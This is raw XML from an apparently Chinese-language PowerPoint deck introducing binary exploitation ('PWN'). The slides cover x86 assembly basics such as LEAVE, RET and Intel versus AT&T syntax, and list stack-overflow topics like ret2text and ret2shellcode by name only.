            <a:off x="2547765" y="4902767"/>
            <a:ext cx="6132448"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POP EAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B521834-EBC8-43B7-B1AA-30A369D345A2}"/>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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述</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53570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17AFD78-12AE-410C-AAF3-BD8E4ED6EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="1624900"/>
            <a:ext cx="1314784" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>LEAVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7420CDA-CDD9-4688-ADFE-6D616CF27041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2329686"/>
            <a:ext cx="6132448"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在函数返回时，恢复父函数栈帧的指令</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等效于：</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MOV ESP, EBP</a:t>
            </a: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POP EBP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9BFB4D-4A8C-4E31-AD23-3BA2EB50B4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116396" y="3805856"/>
            <a:ext cx="862737" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>RET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13BECEDD-CC58-4F43-896E-4CDF1DFEF444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547763" y="4423550"/>
            <a:ext cx="8437915"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在函数返回时，控制程序执行流返回父函数的指令</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等效于：</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POP RIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（这条指令实际是不存在的，不能直接向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器传送数据）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1598CFC-3167-47A4-B6B0-854F5871AB04}"/>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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述</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4526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Shape 228">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042C1C45-6B35-42E3-85B6-55A4A324188F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="858910591"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3162350" y="1753782"/>
          <a:ext cx="5867300" cy="2336970"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2933650">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2933650">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" dirty="0"/>
                        <a:t>ntel</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0"/>
                        <a:t>AT&amp;T</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>mov eax, 8</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>movl $8, %eax</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0">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338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>mov ebx, 0ffffh</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>movl $0xffff, %ebx</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>int 80h</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>int $80</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>mov eax, [ecx]</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>movl (%ecx), %eax</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0">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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 229">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09946BD-1CBB-4464-8F95-4AD615F49DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142289" y="4360463"/>
            <a:ext cx="2954557" cy="1954369"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sum:</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push ebp</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mov ebp, esp</a:t>
            </a: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mov eax, [ebp+12]</a:t>
            </a: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add eax, [ebp+8]</a:t>
            </a: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pop ebp</a:t>
            </a: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retn</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 230">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521B6488-A68F-4405-8F87-1138DEBF34D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096846" y="4360463"/>
            <a:ext cx="2932804" cy="1954369"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sum:</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pushl %ebp</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movl %esp,%ebp</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movl 12(%ebp),%eax</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addl 8(%ebp),%eax</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popl %ebp</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ret</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endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF3B19CA-C801-468F-B577-E5237DA13117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080337" y="971286"/>
            <a:ext cx="2031325"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两种汇编格式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE4A910-F332-40BC-9B7F-B077C4B7848B}"/>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x86&amp;amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>汇编简述</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33830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F2DA9E7-F3F0-450B-B6C1-AB548372BBC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="8165762" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>栈溢出基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A9DF66-10FF-420B-91B3-2B7CCBCAB118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589811" y="3049184"/>
            <a:ext cx="7730836" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语言函数调用栈</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ret2text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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ret2shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3961958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7C11A0F-4A40-400B-9DC4-E669E438E04F}"/>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9182637" y="4893307"/>
            <a:ext cx="3009363" cy="1964693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98AEB040-472E-45B8-B07E-B8CC64CBBEE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2307771" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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PWN? | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>概述</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F9423184-07F3-4070-A230-1A2EA62E6F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477229" y="2588653"/>
            <a:ext cx="5705408" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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破解、利用成功（程序的二进制漏洞）</a:t>
            </a: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攻破（设备、服务器）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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控制（设备、服务器）</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30159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4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D491AA73-6C9F-41E1-A9CA-BAD9AB5CDD63}"/>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5009183" y="1632769"/>
            <a:ext cx="6858000" cy="4152900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6875684-F35E-4A07-9595-7E0A2B6174F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534943" y="1629549"/>
            <a:ext cx="4011299" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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函数调用栈是指程序运行时内存一段连续的区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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用来保存函数运行时的状态信息，包括函数参数与局部变量等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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称之为“栈”是因为发生函数调用时，调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
